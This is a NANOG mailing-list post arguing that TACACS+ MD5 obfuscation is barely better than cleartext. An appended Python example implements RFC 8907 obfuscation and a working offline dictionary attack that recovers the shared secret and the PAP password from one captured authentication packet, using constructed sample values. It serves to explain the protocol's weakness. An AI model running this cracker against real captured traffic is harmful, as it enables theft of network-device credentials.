On Wed, Sep 20, 2023 at 11:16 AM Mike Lewinski via NANOG <nanog@nanog.org> wrote:
Yes. Well, on the plus side, the TACACS protocol has not really changed in 30 years;
even the 2015 code could work, provided you can compile its dependencies from source, right...
On the downside, for command authorization use:
TACACS+ provides little protection for messages between client and server.
The protocol's MD5 crypto is so weak that routers using TACACS+ for authentication
might as well just be piping user credentials over in the clear: it's barely any better.
Router operating systems still typically use only passwords with
SSH, and then those devices send the passwords over that insecure channel. I have yet to
see much in terms of routers capable of TACACS+ authorizing users based on the user's
OpenSSH certificate, public key ID, ed25519-sk security key ID, etc.
In short: unless you have a VPN or a dedicated secure link from every single device to
its TACACS+ server, or an experimental implementation of TACACS+ over TLS,
I would suggest considering using tools or scripts to distribute users and authorization configurations to
devices as local authorization over secure protocols, in preference to network authentication systems
that transmit sensitive decisions and user data across the network using insecure protocols.
--
-Jim
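The MD5 "crypto" Jim describes, as an added example that is not part of the thread or of any TACACS+ implementation: the body obfuscation specified in RFC 8907 section 4.5 (a chained MD5 over session_id, shared key, version and seq_no, XORed into the body, with no integrity check) implemented as written, and then the reason it is barely better than cleartext: the header is sent unobfuscated, so anyone holding one captured packet can test candidate shared secrets offline and knows they hit when the recovered body parses as a structurally valid authentication START. The constants are taken from RFC 8907; the session ID, usernames, port, address, password, shared secret and wordlist are constructed sample values for the demonstration.

```python
"""Added example: RFC 8907 TACACS+ body obfuscation and an offline shared-secret guess against it."""
import hashlib
import struct

# Constants from RFC 8907 (not from the thread).
TAC_PLUS_VERSION = 0xc0            # major version 0xc, minor version 0
TAC_PLUS_AUTHEN = 0x01             # packet type: authentication
TAC_PLUS_UNENCRYPTED_FLAG = 0x01   # header flag: body sent without obfuscation
TAC_PLUS_AUTHEN_LOGIN = 0x01
TAC_PLUS_AUTHEN_TYPE_PAP = 0x02    # for PAP the password travels in the START data field
TAC_PLUS_AUTHEN_SVC_LOGIN = 0x01
HEADER = struct.Struct("!BBBBII")  # version, type, seq_no, flags, session_id, length


def pseudo_pad(session_id, key, version, seq_no, length):
    """RFC 8907 s4.5: MD5_1 = MD5(session_id|key|version|seq_no), MD5_n = MD5(...|MD5_{n-1})."""
    prefix = struct.pack("!I", session_id) + key + bytes([version, seq_no])
    pad, prev = b"", b""
    while len(pad) < length:
        prev = hashlib.md5(prefix + prev).digest()
        pad += prev
    return pad[:length]


def obfuscate(body, session_id, key, version, seq_no):
    """XOR the body with the pad; the same call de-obfuscates. There is no MAC."""
    pad = pseudo_pad(session_id, key, version, seq_no, len(body))
    return bytes(b ^ p for b, p in zip(body, pad))


def build_pap_start(session_id, seq_no, key, user, port, rem_addr, password, priv_lvl=1):
    """Authentication START for a PAP login as a NAS would send it (constructed sample)."""
    body = struct.pack("!8B", TAC_PLUS_AUTHEN_LOGIN, priv_lvl, TAC_PLUS_AUTHEN_TYPE_PAP,
                       TAC_PLUS_AUTHEN_SVC_LOGIN, len(user), len(port), len(rem_addr), len(password))
    body += user + port + rem_addr + password
    header = HEADER.pack(TAC_PLUS_VERSION, TAC_PLUS_AUTHEN, seq_no, 0, session_id, len(body))
    return header + obfuscate(body, session_id, key, TAC_PLUS_VERSION, seq_no)


def parse_start(body):
    """Return the START fields if the plaintext is structurally valid, else None.
    Field ranges follow RFC 8907: action LOGIN/CHPASS/SENDAUTH, priv_lvl 0..15,
    authen_type 1..6, service 0..9, and the four lengths must account for the body."""
    if len(body) < 8:
        return None
    action, priv_lvl, authen_type, service, ulen, plen, rlen, dlen = body[:8]
    if action not in (1, 2, 4) or priv_lvl > 15 or not 1 <= authen_type <= 6 or service > 9:
        return None
    if 8 + ulen + plen + rlen + dlen != len(body):
        return None
    user = body[8:8 + ulen]
    port = body[8 + ulen:8 + ulen + plen]
    rem_addr = body[8 + ulen + plen:8 + ulen + plen + rlen]
    data = body[8 + ulen + plen + rlen:]
    if not all(0x20 <= c < 0x7f for c in user + port):  # user and port are printable text
        return None
    return {"action": action, "priv_lvl": priv_lvl, "authen_type": authen_type,
            "user": user, "port": port, "rem_addr": rem_addr, "data": data}


def recover_key(packet, wordlist):
    """Offline guess of the shared secret from one captured packet. The header is cleartext,
    so each candidate key gives a candidate pad; a valid START confirms the key and yields
    the fields, including the PAP password. Returns (key, fields) or None."""
    version, ptype, seq_no, flags, session_id, length = HEADER.unpack_from(packet)
    body = packet[HEADER.size:HEADER.size + length]
    if ptype != TAC_PLUS_AUTHEN or flags & TAC_PLUS_UNENCRYPTED_FLAG:
        return None  # only obfuscated authentication packets are handled here
    for key in wordlist:
        fields = parse_start(obfuscate(body, session_id, key, version, seq_no))
        if fields is not None:
            return key, fields
    return None


# Constructed sample: one captured NAS -> server packet and a tiny wordlist (hypothetical values).
CAPTURE = build_pap_start(0x1234abcd, 1, b"s3cret", b"admin", b"tty0", b"192.0.2.10", b"hunter2")
WORDLIST = [b"cisco", b"tacacs", b"password", b"s3cret"]

if __name__ == "__main__":
    hit = recover_key(CAPTURE, WORDLIST)
    if hit:
        key, fields = hit
        print("shared secret:", key, "user:", fields["user"], "password:", fields["data"])
```

The per-packet pad depends only on header fields and the shared secret, so the secret is the sole defence; a weak or reused secret turns every capture into a credential leak, which is the reason the post recommends moving the authentication and authorization data onto a transport that actually provides confidentiality and integrity.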